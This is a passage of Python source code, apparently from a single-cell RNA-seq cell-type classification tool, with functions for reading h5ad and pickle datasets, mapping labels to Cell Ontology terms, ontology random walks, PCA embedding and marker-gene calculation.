find_gene_ind(genes, common_genes):\n\tgid = []\n\tfor g in common_genes:\n\t\tgid.append(np.where(genes == g)[0][0])\n\tgid = np.array(gid)\n\treturn gid\n\n\ndef RandomWalkOntology(onto_net, l2i, ontology_nlp_file, ontology_nlp_emb_file, rst = 0.7):\n\tncls = len(l2i)\n\tonto_net_nlp, _, onto_nlp_emb = read_cell_ontology_nlp(l2i, ontology_nlp_file, ontology_nlp_emb_file)\n\tonto_net_nlp = (cosine_similarity(onto_nlp_emb) + 1 ) /2#1 - spatial.distance.cosine(onto_nlp_emb, onto_nlp_emb)\n\tonto_net_mat = np.zeros((ncls, ncls))\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\tif n1==n2:\n\t\t\t\tcontinue\n\t\t\tonto_net_mat[n1,n2] = onto_net_nlp[n1, n2]\n\t\t\tonto_net_mat[n2,n1] = onto_net_nlp[n2, n1]\n\tonto_net_rwr = RandomWalkRestart(onto_net_mat, rst)\n\treturn onto_net_rwr\n\n\ndef process_expression(c2g_list):\n\t#this data process function is motivated by ACTINN, please check ACTINN for more information.\n\tc2g = np.vstack(c2g_list)\n\tc2g = c2g.T\n\t#print ('onclass d0',np.shape(c2g))\n\tc2g = c2g[np.sum(c2g, axis=1)>0, :]\n\t#print (c2g)\n\t#print ('onclass d1',np.shape(c2g))\n\tc2g = np.divide(c2g, np.sum(c2g, axis=0, keepdims=True)) * 10000\n\tc2g = np.log2(c2g+1)\n\texpr = np.sum(c2g, axis=1)\n\t#total_set = total_set[np.logical_and(expr >= np.percentile(expr, 1), expr <= np.percentile(expr, 99)),]\n\n\tc2g = c2g[np.logical_and(expr >= np.percentile(expr, 1), expr <= np.percentile(expr, 99)),]\n\t#print (c2g)\n\t#print ('onclass d2',np.shape(c2g))\n\tcv = np.std(c2g, axis=1) / np.mean(c2g, axis=1)\n\tc2g = c2g[np.logical_and(cv >= np.percentile(cv, 1), cv <= np.percentile(cv, 99)),]\n\t#print (c2g)\n\t#print ('onclass d3',np.shape(c2g))\n\tc2g = c2g.T\n\t#print (c2g)\n\t#print ('onclass d4',np.shape(c2g))\n\tc2g_list_new = []\n\tindex = 0\n\tfor c in c2g_list:\n\t\tncell = np.shape(c)[0]\n\t\tc2g_list_new.append(c2g[index:index+ncell,:])\n\t\tindex = ncell\n\treturn c2g_list_new\n\n\ndef read_ontology_file(dname, data_folder):\n\tif 'allen' in dname:\n\t\tcell_type_network_file = data_folder + 'allen.ontology'\n\t\tcell_type_nlp_emb_file = None\n\t\tcl_obo_file = None\n\t\tif not os.path.isfile(cell_type_network_file):\n\t\t\tsys.error(cell_type_network_file + ' not found!')\n\telse:\n\t\tcell_type_network_file = data_folder + 'cl.ontology'\n\t\tcell_type_nlp_emb_file = data_folder + 'cl.ontology.nlp.emb'\n\t\tcl_obo_file = data_folder + 'cl.obo'\n\t\tif not os.path.isfile(cell_type_nlp_emb_file):\n\t\t\tsys.exit(cell_type_nlp_emb_file + ' not found!')\n\t\tif not os.path.isfile(cell_type_network_file):\n\t\t\tsys.exit(cell_type_network_file + ' not found!')\n\t\tif not os.path.isfile(cl_obo_file):\n\t\t\tsys.exit(cl_obo_file + ' not found!')\n\treturn cell_type_nlp_emb_file, cell_type_network_file, cl_obo_file\n\n\ndef read_data_file(dname, data_dir):\n\tif 'microcebus' in dname:\n\t\ttech = '10x'\n\t\tfeature_file = data_dir + 'Lemur/' + dname +'.h5ad'\n\t\tfilter_key={'method':tech }\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tlabel_key = 'cell_ontology_class'\n\telif 'muris' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + 'Tabula_Muris_Senis/' + 'tabula-muris-senis-'+tech+'-official-raw-obj.h5ad'\n\t\tfilter_key = {}\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tbatch_key = ''\n\t\tlabel_key = 'cell_ontology_class'\n\telif 'sapiens' in dname:\n\t\tfeature_file = data_dir + 'sapiens/' + 'Pilot1_Pilot2_decontX_Oct2020.h5ad'\n\t\tfilter_key = {}\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tbatch_key = ''\n\t\tlabel_key = 'cell_ontology_type'\n\telif 'allen' in dname:\n\t\tfeature_file = data_dir + '/Allen_Brain/features.pkl'\n\t\tlabel_file = data_dir + '/Allen_Brain/labels.pkl'\n\t\tgene_file = data_dir + '/Allen_Brain/genes.pkl'\n\t\tlabel_key = ''\n\t\tfilter_key = {}\n\telif 'krasnow' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + '/HLCA/'+tech+'_features.pkl'\n\t\tlabel_file = data_dir + '/HLCA/'+tech+'_labels.pkl'\n\t\tgene_file = data_dir + '/HLCA/'+tech+'_genes.pkl'\n\t\tlabel_key = ''\n\t\tfilter_key = {}\n\telse:\n\t\tsys.exit('wrong dname '+dname)\n\tif feature_file.endswith('.pkl'):\n\t\treturn feature_file, filter_key, label_key, label_file, gene_file\n\telif feature_file.endswith('.h5ad'):\n\t\treturn feature_file, filter_key, label_key, label_file, gene_file\n\tsys.exit('wrong file suffix')\n\n\ndef read_singlecell_data(dname, data_dir, ontology_dir, nsample = 500000000, read_tissue = False, exclude_non_leaf_ontology = True):\n\tif 'microcebus' in dname:\n\t\ttech = '10x'\n\t\t#file = data_dir + 'TMS_official_060520/' + 'tabula-microcebus_smartseq2-10x_combined_annotated_filtered_gene-labels-correct.h5ad'\n\t\tfile = data_dir + 'TMS_official_060520/' + dname +'.h5ad'\n\t\tfilter_key={'method':tech }\n\t\tbatch_key = ''#original_channel\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tif not read_tissue:\n\t\t\tfeature, label, genes = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, filter_key = filter_key, cell_ontology_file = ontology_file, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\t\telse:\n\t\t\tfeature, label, genes, tissues = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, filter_key = filter_key, cell_ontology_file = ontology_file, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\telif 'muris' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfile = data_dir + 'TMS_official_060520/' + 'tabula-muris-senis-'+tech+'-official-raw-obj.h5ad'\n\t\tfilter_key = {}\n\t\tbatch_key = ''\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tif not read_tissue:\n\t\t\tfeature, label, genes = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, cell_ontology_file = ontology_file, filter_key=filter_key, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\t\telse:\n\t\t\tfeature, label, genes, tissues = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, cell_ontology_file = ontology_file, filter_key=filter_key, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\telif 'allen_part' in dname:\n\t\tfeature_file = data_dir + 'Allen/matrix_part.csv'\n\t\tlabel_file = data_dir + 'Allen/metadata.csv'\n\t\tontology_file = data_dir + 'Allen/cell_type_ontology'\n\t\tontology_nlp_file = None\n\t\tfeature, label, genes = parse_csv(feature_file, label_file, nsample = nsample, label_key='cell_type_accession_label', exclude_non_ontology = True, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telif 'allen' in dname:\n\t\tfeature_file = data_dir + 'Allen/features.pkl'\n\t\tlabel_file = data_dir + 'Allen/labels.pkl'\n\t\tgene_file = data_dir + 'Allen/genes.pkl'\n\t\tontology_file = data_dir + 'Allen/cell_type_ontology'\n\t\tontology_nlp_file = None\n\t\tfeature, label, genes = parse_pkl(feature_file, label_file, gene_file, nsample = nsample, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telif 'krasnow' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + 'Krasnow/'+tech+'_features.pkl'\n\t\tlabel_file = data_dir + 'Krasnow/'+tech+'_labels.pkl'\n\t\tgene_file = data_dir + 'Krasnow/'+tech+'_genes.pkl'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tfeature, label, genes = parse_pkl(feature_file, label_file, gene_file, nsample = nsample, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telse:\n\t\tsys.exit('wrong dname '+dname)\n\tif read_tissue:\n\t\treturn feature, label, genes, tissues, ontology_nlp_file, ontology_file\n\telse:\n\t\treturn feature, label, genes, ontology_nlp_file, ontology_file\n\n\ndef parse_krasnow(feature_file, label_file, gene_file, seed = 1, nsample = 1000,exclude_non_leaf_ontology = True, exclude_non_ontology = True, cell_ontology_file=None):\n\tnp.random.seed(seed)\n\n\tif feature_file.endswith('.pkl'):\n\t\tfeatures = pickle.load(open(feature_file, 'rb'))\n\t\tlabels = pickle.load(open(label_file, 'rb'))\n\t\tgenes = pickle.load(open(gene_file, 'rb'))\n\t\tncell, ngene = np.shape(features)\n\t\tassert(ncell == len(labels))\n\t\tassert(ngene == len(genes))\n\t\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\t\tfeatures = features[index, :]\n\t\tlabels = labels[index]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeatures = features[new_ids, :]\n\t\tlabels = labels[new_ids]\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\treturn features, labels, genes\n\n\ndef parse_pkl(feature_file, label_file, gene_file, seed = 1, nsample = 10000000,exclude_non_leaf_ontology = True, cell_ontology_file=None):\n\tnp.random.seed(seed)\n\tif feature_file.endswith('.pkl'):\n\t\tfeatures = pickle.load(open(feature_file, 'rb'))\n\t\tlabels = pickle.load(open(label_file, 'rb'))\n\t\tgenes = pickle.load(open(gene_file, 'rb'))\n\t\tncell, ngene = np.shape(features)\n\t\tassert(ncell == len(labels))\n\t\tassert(ngene == len(genes))\n\t\tindex = np.random.choice(ncell,ncell,replace=False)\n\t\tfeatures = features[index, :]\n\t\tlabels = labels[index]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeatures = features[new_ids, :]\n\t\tlabels = labels[new_ids]\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\treturn features, labels, genes\n\n\ndef select_high_var_genes(train_X, test_X, ngene = 200):\n\tmat = np.vstack((train_X, test_X))\n\t#mat = mat.todense()\n\tgstd = np.std(mat, axis=0)\n\tbest_genes = np.argsort(gstd*-1)\n\tbest_genes = best_genes[:ngene]\n\treturn train_X[:, best_genes], test_X[:, best_genes]\n\n\ndef emb_cells(train_X, test_X, dim=20):\n\tif dim==-1:\n\t\treturn np.log1p(train_X.todense()), np.log1p(test_X.todense())\n\ttrain_X = np.log1p(train_X)\n\ttest_X = np.log1p(test_X)\n\ttrain_X = preprocessing.normalize(train_X, axis=1)\n\ttest_X = preprocessing.normalize(test_X, axis=1)\n\tntrain = np.shape(train_X)[0]\n\tmat = sparse.vstack((train_X, test_X))\n\tU, s, Vt = pca(mat, k=dim) # Automatically centers.\n\tX = U[:, range(dim)] * s[range(dim)]\n\treturn X[:ntrain,:], X[ntrain:,:]\n\n\ndef write_markers(fname, markers):\n\t## Write marker genes to file\n\tfmarker_genes = open(fname,'w')\n\tfor t in markers:\n\t\tfmarker_genes.write(t+'\\t')\n\t\tg2pv = sorted(markers[t].items(), key=lambda item: item[1])\n\t\tfor g,pv in g2pv:\n\t\t\tfmarker_genes.write(g+'(pv:'+'{:.2e}'.format(pv)+')\\t')\n\t\tfmarker_genes.write('\\n')\n\tfmarker_genes.close()\n\n\ndef calculate_markers(cell2term, cell2gene, genes, terms, topk_cells=500, only_over_expressed = True, return_k_genes = 100):\n\tncell, nterm = np.shape(cell2term)\n\tngene = np.shape(cell2gene)[1]\n\tassert(ncell == np.shape(cell2gene)[0])\n\tmarkers = collections.defaultdict(dict)\n\tfor t in range(nterm):\n\t\tscs = np.argsort(cell2term[:,t])\n\t\tk_bot_cells = scs[:topk_cells]\n\t\tk_top_cells = scs[ncell-topk_cells:]\n\t\tpv = scipy.stats.ttest_ind(cell2gene[k_top_cells,:], cell2gene[k_bot_cells,:], axis=0)[1] #* ngene\n\t\ttop_mean = np.mean(cell2gene[k_top_cells,:],axis=0)\n\t\tbot_mean = np.mean(cell2gene[k_bot_cells,:],axis=0)\n\t\tif only_over_expressed:\n\t\t\tfor g in range(ngene):\n\t\t\t\tif top_mean[g] < bot_mean[g]:\n\t\t\t\t\tpv[g] = 1.\n\t\tpv_sort = list(np.argsort(pv))\n\t\t#for i in range(return_k_genes):\n\t\t#markers[terms[t]][genes[pv_sort[i]]] = pv[pv_sort[i]]\n\t\tmarkers[terms[t]] = pv\n\t\tfor i,p in enumerate(pv):\n\t\t\tif np.isnan(p):\n\t\t\t\tpv[i] = 1.\n\t\t\t#markers[terms[t]][str(pv_sort[i])] = pv[pv_sort[i]]\n\treturn markers\n\ndef peak_h5ad(file):\n\t\"\"\"\n\tpeak the number of cells, classes, genes in h5ad file\n\t\"\"\"\n\tx = read_h5ad(file)\n\t#print (np.shape(x.X))\n\t#print (x.X[:10][:10])\n\t#print (x.obs.keys())\n\tncell, ngene = np.shape(x.X)\n\tnclass = len(np.unique(x.obs['free_annotation']))\n\t#print (np.unique(x.obs['free_annotation']))\n\tf2name = {}\n\tsel_cell = 0.\n\tfor i in range(ncell):\n\t\tif x.obs['method'][i]!='10x':\n\t\t\tcontinue\n\n\t\tfree = x.obs['free_annotation'][i]\n\t\tname = x.obs['cell_ontology_class'][i]\n\t\tf2name[free] = name\n\t\tsel_cell += 1\n\treturn sel_cell, ngene, nclass\n\n\ndef get_onotlogy_parents(GO_net, g):\n\tterm_valid = set()\n\tngh_GO = set()\n\tngh_GO.add(g)\n\twhile len(ngh_GO) > 0:\n\t\tfor GO in list(ngh_GO):\n\t\t\tfor GO1 in GO_net[GO]:\n\t\t\t\tngh_GO.add(GO1)\n\t\t\tngh_GO.remove(GO)\n\t\t\tterm_valid.add(GO)\n\treturn term_valid\n\n\ndef exclude_non_ontology_term(cl_obo_file, labels, label_key):\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\tnew_labs = []\n\tnew_ids = []\n\tif label_key!='cell_ontology_class' and label_key!='cell_ontology_id':\n\t\tuse_co = False\n\t\tfor kk in np.unique(labels):\n\t\t\tif kk.lower().startswith('cl:'):\n\t\t\t\tuse_co = True\n\t\t\t\tbreak\n\telse:\n\t\tif label_key == 'cell_ontology_class':\n\t\t\tuse_co = False\n\t\telse:\n\t\t\tuse_co = True\n\tfor i in range(len(labels)):\n\t\tl = labels[i]\n\t\tif not use_co:\n\t\t\tif l.lower() in name2co.keys():\n\t\t\t\tnew_labs.append(name2co[l.lower()])\n\t\t\t\tnew_ids.append(i)\n\t\telse:\n\t\t\tif l.lower() in co2name.keys():\n\t\t\t\tnew_labs.append(l.lower())\n\t\t\t\tnew_ids.append(i)\n\tnew_labs = np.array(new_labs)\n\tnew_ids = np.array(new_ids)\n\treturn new_ids, new_labs\n\n\ndef parse_raw_h5ad(file,seed=1,nsample=1e10,tissue_key='tissue',label_key='cell_ontology_class', read_tissue = True, batch_key = '', filter_key={}, cell_ontology_file = None, exclude_non_leaf_ontology = True, exclude_non_ontology=True, cl_obo_file = None):\n\tnp.random.seed(seed)\n\tx = read_h5ad(file)\n\n\tncell = np.shape(x.raw.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeature = x.raw.X[select_cells, :]\n\tlabels = np.array(x.obs[label_key].tolist())[select_cells]\n\tif read_tissue:\n\t\ttissues = np.array(x.obs[tissue_key].tolist())[select_cells]\n\tif batch_key=='' or batch_key not in x.obs.keys():\n\t\tbatch_labels = np.ones(len(labels))\n\telse:\n\t\tbatch_labels = np.array(x.obs[batch_key].tolist())[select_cells]\n\tgenes = x.var.index\n\tncell = len(select_cells)\n\tif exclude_non_ontology:\n\t\tnew_ids, labels = exclude_non_ontology_term(cl_obo_file, labels, label_key)\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\t\tlabels = labels[new_ids]\n\t\tif read_tissue:\n\t\t\ttissues = tissues[new_ids]\n\tncell = len(labels)\n\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\tbatch_labels = batch_labels[index]\n\tfeature = feature[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif read_tissue:\n\t\ttissues = tissues[index]\n\tgenes = x.var.index\n\tcorrected_feature = run_scanorama_same_genes(feature, batch_labels)\n\tcorrected_feature = corrected_feature.toarray()\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\tif read_tissue:\n\t\tassert(len(tissues) == len(labels))\n\t\treturn corrected_feature, labels, genes, tissues\n\telse:\n\t\treturn corrected_feature, labels, genes\n\n\ndef select_cells_based_on_keys(x, features, tissues = None, labels = None, filter_key = None):\n\tncell = np.shape(x.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeatures = features[select_cells,: ]\n\tif labels is not None:\n\t\tlabels = labels[select_cells]\n\tif tissues is not None:\n\t\ttissues = tissues[select_cells]\n\tx = x[select_cells,:]\n\treturn features, labels, tissues, x\n\n\ndef find_marker_genes(train_X, pred_Y_all, genes, i2l, topk = 50):\n\tcor = corr2_coeff(pred_Y_all[:,:].T, train_X[:,:].T)\n\tcor = np.nan_to_num(cor) # cell type to gene\n\tnl = len(i2l)\n\tc2g = {}\n\tfor i in range(nl):\n\t\tgl = np.argsort(cor[i,:]*-1)\n\t\tc2g[i2l[i]] = {}\n\t\tfor j in range(topk):\n\t\t\tc2g[i2l[i]][genes[gl[j]]] = cor[i, gl[j]]\n\treturn c2g, cor\n\n\ndef use_pretrained_model(OnClass, genes, test_X, models = []):\n\tlast_l2i = {}\n\tlast_i2l = {}\n\n\tpred_Y_all_models = 0.\n\tngene = len(genes)\n\tfor model in models:\n\t\tOnClass.BuildModel(OnClass.co2emb, ngene = ngene, use_pretrain = model)\n\t\tprint ('Build model finished for ',model)\n\t\tpred_Y_seen, pred_Y_all, pred_label = OnClass.Predict(test_X, test_genes = genes)\n\t\tprint ('Predict for ',model)\n\t\tpred_Y_all = pred_Y_all.T / (pred_Y_all.T.sum(axis=1)[:, np.newaxis] + 1)\n\t\tpred_Y_all = pred_Y_all.T\n\t\tif len(last_l2i)>0:\n\t\t\tnew_ct_ind = []\n\t\t\tfor i in range(len(last_i2l)):\n\t\t\t\tl = last_i2l[i]\n\t\t\t\tnew_ct_ind.append(OnClass.co2i[l])\n\t\t\tpred_Y_all = pred_Y_all[:, np.array(new_ct_ind)]\n\t\t\tpred_Y_all_models += pred_Y_all\n\t\telse:\n\t\t\tlast_l2i = OnClass.co2i\n\t\t\tlast_i2l = OnClass.i2co\n\t\t\tpred_Y_all_models = pred_Y_all\n\treturn pred_Y_all_models\n\ndef read_data(feature_file, cell_ontology_ids, exclude_non_leaf_ontology = False, ct_mapping_key = {}, tissue_key = None, seed = 1, filter_key = None, AnnData_label_key=None, nlp_mapping = True, nlp_mapping_cutoff = 0.8, co2emb = None, label_file=None, cl_obo_file = None, cell_ontology_file = None, memory_saving_mode = False, backup_file='sparse_featurefile_backup'):\n\t\"\"\"\n\tRead data from the given feature file, and processes it so that it fits with the other\n\tgiven paramters as needed.\n\tParameters\n\t----------\n\tfeature_file: `string`\n\t\tname of file to extract data from. The data in the file must be stored in h5ad file format.\n\tcell_ontology_ids: `set`\n\t\tset of ids from the cell ontology.\n\tAnnData_label_key: `numpy.ndarray`, optional (None)\n\t\tmapping of the cell type classes to reindex the labels in the AnnData object\n\tco2emb: `map`, optional (None)\n\t\tmaps cell-type from the cell ontology to its embedding\n\tlabel_file: `string`, optional (None)\n\t\tfile from which to get the labels of the feature file\n\tmemory_saving_mode: `bool`, optional (False)\n\t\twhether the method should be run under tight RAM constraints.\n\tbackup_file: `string`, optional ('sparse_featurefile_backup')\n\t\tthe name of the file to copy the sparse feature dataset to.\n\n\tReturns\n\t-------\n\tdataset: `numpy.ndarray` or `scipy.sparse.csr_matrix` (depends on mode)\n\t\tgene expression matrix of cell types for the test set\n\tgenes: `list`\n\t\tlist of genes in the dataset\n\tlabels: `numpy.ndarray`\n\t\tlabels from the feature file\n\tx: AnnData object stored in the given feature file\n\t\"\"\"\n\t\n\tnp.random.seed(seed)\n\t\n\tif memory_saving_mode:\t\n\t\tx = read_h5ad(feature_file, backed='r+')\n\t\tdataset = x.X.to_memory() # Gets a sparse array in csr matrix form\n\telse:\n\t\tx = read_h5ad(feature_file)\n\t\tdataset = x.X.toarray()\n\n\t# if memory_saving_mode:\n\t# print_memory_usage(\"while reading data\")\n\n\tncell = np.shape(x.X)[0]\n\tgenes = np.array([x.upper() for x in x.var.index])\n\n\tif tissue_key is not None:\n\t\ttissues = np.array(x.obs[tissue_key].tolist())\n\telse:\n\t\ttissues = None\n\tif AnnData_label_key is None and label_file is None:\n\t\tprint ('no label file is provided')\n\t\tlabels = None\n\t\tdataset, labels, tissues, x = select_cells_based_on_keys(x, dataset, labels = labels, tissues = tissues, filter_key = filter_key)\n\t\treturn dataset, genes, labels, tissues, x\n\tif AnnData_label_key is not None:\n\t\tlabels = x.obs[AnnData_label_key].tolist()\n\telse:\n\t\tfin = open(label_file)\n\t\tlabels = []\n\t\tfor line in fin:\n\t\t\tlabels.append(line.strip())\n\t\tfin.close()\n\tlabels = np.array(labels)\n\tdataset, labels, tissues, x = select_cells_based_on_keys(x, dataset, labels = labels, tissues = tissues, filter_key = filter_key)\n\n\tif memory_saving_mode:\n\t\tx = x.copy(filename=backup_file)\n\n\tind, labels, unfound_labs = map_and_select_labels(labels, cell_ontology_ids, cl_obo_file, ct_mapping_key = ct_mapping_key, nlp_mapping = nlp_mapping, co2emb = co2emb, nlp_mapping_cutoff = nlp_mapping_cutoff, cl_obo_file = cl_obo_file)\n\tif tissue_key is not None:\n\t\ttissues = tissues[ind]\n\tdataset = dataset[ind, :]\n\n\tif memory_saving_mode:\n\t\t# Need to copy to disk for rewriting to the sparse dataset\n\t\tx = x[ind, :].copy(filename=backup_file)\n\telse:\n\t\tx = x[ind, :]\n\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\ttissues = tissues[new_ids]\n\t\tdataset = dataset[new_ids, :]\n\t\tlabels = labels[new_ids]\n\t\tx = x[new_ids, :]\n\n\tncell = np.shape(dataset)[0]\n\tindex = np.random.choice(ncell,ncell,replace=False)\n\tdataset = dataset[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif tissue_key is not None:\n\t\ttissues = tissues[index]\n\treturn dataset, genes, labels, tissues, x\n\n\ndef exact_match_co_name_2_co_id(labels, lab2co, cl_obo_file = None):\n\tif cl_obo_file is None:\n\t\treturn lab2co\n\tco2name, name2co = get_ontology_name(obo_file = cl_obo_file)\n\tfor label in labels:\n\t\tif label.lower() in name2co:\n\t\t\tlab2co[label.lower()] = name2co[label.lower()]\n\tfor name in name2co:\n\t\tlab2co[name.lower()] = name2co[name]\n\treturn lab2co\n\n\ndef map_and_select_labels(labels, cell_ontology_ids, obo_file, ct_mapping_key = {}, nlp_mapping = True, nlp_mapping_cutoff = 0.8, co2emb = None, cl_obo_file = None):\n\tlab2co = {}\n\tif nlp_mapping:\n\t\tif co2emb is None:\n\t\t\tsys.exit('Please provide cell type embedding to do NLP-based mapping.')\n\t\tlab2co = fine_nearest_co_using_nlp(np.unique(labels), co2emb, obo_file,nlp_mapping_cutoff = nlp_mapping_cutoff)\n\tlab2co = exact_match_co_name_2_co_id(np.unique(labels), lab2co, cl_obo_file = cl_obo_file)\n\tfor ct in ct_mapping_key:\n\t\tlab2co[ct_mapping_key[ct]] = lab2co[ct]\n\tind = []\n\tlab_id = []\n\tunfound_labs = set()\n\tfor i,l in enumerate(labels):\n\t\tif l in cell_ontology_ids:\n\t\t\tind.append(i)\n\t\t\tlab_id.append(l)\n\t\telif l.lower() in lab2co:\n\t\t\tind.append(i)\n\t\t\tlab_id.append(lab2co[l.lower()])\n\t\telse:\n\t\t\tunfound_labs.add(l)\n\tfrac = len(ind) * 1. / len(labels)\n\tind = np.array(ind)\n\tlabels = np.array(lab_id)\n\tunfound_labs = set(unfound_labs)\n\twarn_message = 'Warning: Only: %f precentage of labels are in the Cell Ontology. The remaining cells are excluded! Consider using NLP mapping and choose a small mapping cutoff (nlp_mapping_cutoff)' % (frac * 100)\n\tif frac < 0.5:\n\t\tprint (warn_message)\n\t\tprint ('Here are unfound labels:',unfound_labs)\n\treturn ind, labels, unfound_labs\n\ndef parse_h5ad(file,seed=1,nsample=1e10,label_key='cell_ontology_class', read_tissue = False, batch_key = '', filter_key={}, cell_ontology_file = None, exclude_non_leaf_ontology = True, exclude_non_ontology=True, cl_obo_file = None):\n\t'''\n\tread h5ad file\n\tfeature: cell by gene expression\n\tlabel: cell ontology class\n\tgenes: gene names HGNC\n\t'''\n\tnp.random.seed(seed)\n\tx = read_h5ad(file)\n\tncell = np.shape(x.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeature = x.X[select_cells, :]\n\tlabels = np.array(x.obs[label_key].tolist())[select_cells]\n\tif read_tissue:\n\t\ttissues = np.array(x.obs['tissue'].tolist())[select_cells]\n\tif batch_key=='' or batch_key not in x.obs.keys():\n\t\tbatch_labels = np.ones(len(labels))\n\telse:\n\t\tbatch_labels = np.array(x.obs[batch_key].tolist())[select_cells]\n\tgenes = x.var.index\n\tncell = len(select_cells)\n\n\tif exclude_non_ontology:\n\t\tnew_ids, labels = exclude_non_ontology_term(cl_obo_file, labels, label_key)\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\t\tlabels = labels[new_ids]\n\t\tif read_tissue:\n\t\t\ttissues = tissues[new_ids]\n\tncell = len(labels)\n\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\tbatch_labels = batch_labels[index]\n\tfeature = feature[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif read_tissue:\n\t\ttissues = tissues[index]\n\tgenes = x.var.index\n\t#corrected_feature = run_scanorama_same_genes(feature, batch_labels)\n\tcorrected_feature = feature.toarray()\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\tif read_tissue:\n\t\tassert(len(tissues) == len(labels))\n\t\treturn corrected_feature, labels, genes, tissues\n\telse:\n\t\treturn corrected_feature, labels, genes\n\n\ndef exclude_parent_child_nodes(cell_ontology_file,labels):\n\tuniq_labels = np.unique(labels)\n\texcludes = set()\n\tnet = collections.defaultdict(dict)\n\tfin = open(cell_ontology_file)\n\tfor line in fin:\n\t\ts,p = line.strip().split('\\t')\n\t\tnet[s][p] = 1 #p is parent\n\tfin.close()\n\tfor n in list(net.keys()):\n\t\tngh = get_ontology_parents(net, n)\n\t\tfor n1 in ngh:\n\t\t\tnet[n][n1] = 1\n\tfor l1 in uniq_labels:\n\t\tfor l2 in uniq_labels:\n\t\t\tif l1 in net[l2] and l1!=l2: #l1 is l2 parent\n\t\t\t\texcludes.add(l1)\n\t#print (excludes)\n\tnew_ids = []\n\tfor i in range(len(labels)):\n\t\tif labels[i] not in excludes:\n\t\t\tnew_ids.append(i)\n\tnew_ids = np.array(new_ids)\n\treturn new_ids, excludes\n\n\ndef corr2_coeff(A, B):\n # Rowwise mean of input arrays & subtract from input arrays themeselves\n A_mA = A - A.mean(1)[:, None]\n B_mB = B - B.mean(1)[:, None]\n\n # Sum of squares across rows\n ssA = (A_mA**2).sum(1)\n ssB = (B_mB**2).sum(1)\n\n # Finally get corr coeff\n 